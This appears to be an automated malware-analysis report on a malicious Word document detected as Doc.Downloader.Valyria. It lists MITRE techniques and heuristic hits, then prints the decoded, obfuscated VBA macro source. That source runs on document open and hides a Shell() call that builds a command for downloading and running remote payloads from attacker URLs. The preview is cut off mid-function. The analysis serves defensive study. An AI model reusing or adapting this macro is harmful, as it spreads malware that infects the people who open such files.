MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands. The ClamAV detection name 'Doc.Downloader.Valyria-6922883-0' further suggests a downloader functionality. The reconstructed command 'cmd /V/c set B^5^z=^ ^ ^ ^ ^ }};^k^a^e{h t a } ; k a e' is part of the obfuscated script, likely preparing to download and execute a secondary payload.
Heuristics (5)
- ClamAV: Doc.Downloader.Valyria-6922883-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6922883-0
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5441 bytes |

SHA-256: b2cdcf717ee4a3cda860e177e412ff407fec2f0b14084cd2da76af580878fc4f

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "kMmKwniljVlPK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Month Format("3020" + "3818" + "508600536" + "pi")
Month Format("351232743" + "jDzlsUhQzbvmi" + "qZFFv" + "495106892")
Month Format("8780" + "402608255")
Month Format("zXjoUSrUo" + "501962482")
Month Format("1766" + "jJL" + "vNpZIDqD" + "Bj")
Shell Format(AOdTBA) + Format(svmbpVdjjws) + Format(fMzHTNFhk) + fZITY + DRduOYpzGM + Format(ouHWoiSpoPOF) + Format(dYfnvfSrrLQuG), Format(vbHide)
Month Format("nnG" + "h" + "u" + "K")
Month Format("1215" + "w" + "1499" + "t")
Month Format("WFZaLC" + "zaw" + "sQ" + "U")
End Sub
Attribute VB_Name = "dBbIwqqiXVSOJM"
Function fZITY()
On _
Error _
Resume _
Next
Month Format("7710" + "vwzszTBhm" + "OphU" + "pE")
Month Format("Sjvvpb" + "PX")
Month Format("224786749" + "rEL" + "6487" + "391709149")
znBQVn = Chr(12 + 5 + 2 + 17 + 63) + "md" + " /V/" + Chr(8 + 3 + 1 + 12 + 43) + Chr(4 + 1 + 0 + 5 + 24) + "^" + "s^" + "et B" + "^" + "5" + "^z" + "=^ ^ " + " ^ ^" + " ^ " + "^ "
Month Format("jBj" + "FF" + "IRQEItRSvdtRKz" + "wA")
Month Format("467336188" + "wnBMEuNbi")
Month Format("880" + "206604558" + "OJwb" + "MzZcMNXl")
Month Format("qOzc" + "449540882")
RlvEA = "^ ^ ^ " + "^" + " ^ ^}}" + "{" + "^h" + Chr(12 + 5 + 2 + 17 + 63) + "^t" + "^a" + Chr(12 + 5 + 2 + 17 + 63) + "^}^" + ";^k^a^e"
Month Format("BHAjFvY" + "rP" + "VZbzU" + "CuQfLsBT")
Month Format("L" + "524169272" + "jYFic" + "PYmh")
Month Format("YVjZzciokuVt" + "EEniISoUzu")
Month Format("510735391" + "jP")
FQUHTV = "r^b" + "^;^mf^" + "T$^ m" + "^et^" + "I-"
Month Format("103015912" + "356515384" + "o" + "7219")
jhlCGj = "^e^" + "k^ovn^" + "I;)" + "mfT$" + " ^,m" + Chr(12 + 5 + 2 + 17 + 63) + "U" + "$(e"
Month Format("102" + "233212008" + "4057" + "9131")
Month Format("rQ" + "75908295" + "8369" + "dEcU")
wVDZMXm = "^li" + "^F^d" + "^" + "a^o^ln^" + "woD^."
Month Format("PMiH" + "rUfjZ")
Month Format("NStzLkVQiUND" + "PzPZdSdndziI")
Month Format("516312612" + "U" + "nHFi" + "201278729")
GbYFcQbaiHd = "pK^u^${" + "yr^t^{)" + Chr(8 + 3 + 1 + 12 + 43) + "^G^G^" + "$^ ni^ " + "m" + Chr(12 + 5 + 2 + 17 + 63) + "U" + "^$" + "(^h" + Chr(12 + 5 + 2 + 17 + 63) + "a^er^o"
Month Format("5058" + "3482")
Month Format("2232" + "FMuK")
KGjjE = "^f;" + "'e" + "x^e." + "'+" + Chr(8 + 3 + 1 + 12 + 43) + "^An" + "$+^'\" + "^'^+" + Chr(12 + 5 + 2 + 17 + 63) + "^i"
Month Format("L" + "MshAhdpVCm" + "zCOZPuw" + "z")
Month Format("wL" + "V")
Month Format("479412543" + "TPqdPGDvNz" + "VkPq" + "174585882")
Month Format("7398" + "w" + "GJAnzihRv" + "Kq")
CiFVEfEzVz = "^" + "lbup^:v" + "ne" + "$^=^mf" + "T$;^'^" + "8^7"
Month Format("128235619" + "f")
Month Format("19181976" + "OiE")
jHcJl = "8'^ ^=" + " " + Chr(8 + 3 + 1 + 12 + 43) + "^An^$" + ";)^'^@" + "'(ti^l" + "pS^." + "'n^" + "kt^.^" + "9^k" + "n^bk^=" + "^l"
Month Format("XF" + "7239")
Month Format("qvvdvOfDb" + "5312")
Month Format("22692766" + "zRJB" + "vzcTil" + "zi")
Month Format("115582837" + "2978" + "dppqzr" + "zkFXwwBh")
uofiwPF = "?p^hp^." + "t^o" + "ksnap^o" + "/" + "T^TR/^" + "mo" + Chr(12 + 5 + 2 + 17 + 63) + ".f^h" + "bv^o8" + "y^" + "6r" + "^pyv^1^"
fZITY = znBQVn + RlvEA + FQUHTV + jhlCGj + wVDZMXm + GbYFcQbaiHd + KGjjE + CiFVEfEzVz + jHcJl + uofiwPF
Month Format("i" + "bTzwbO" + "GjW" + "Zn")
Month Format("4984" + "HJkG" + "zkmF" + "AZUndol")
Month Format("FtasPwzzv" + "huzklmF")
End Function
Function DRduOYpzGM()
On _
Error _
Resume _
Next
Month Format("qlJ" + "jzfZ")
jlfAbzGZTf = "h" + "//^:p^t" + "th^'^=" + Chr(8 + 3 + 1 + 12 + 43) + "^G^G^$" + ";^tn^" + "e" + "il" + Chr(8 + 3 + 1 + 12 + 43) + "be" + "^W"
Month Format("459902627" + "DXtU" + "73188835" + "467571472")
Mo
... (truncated)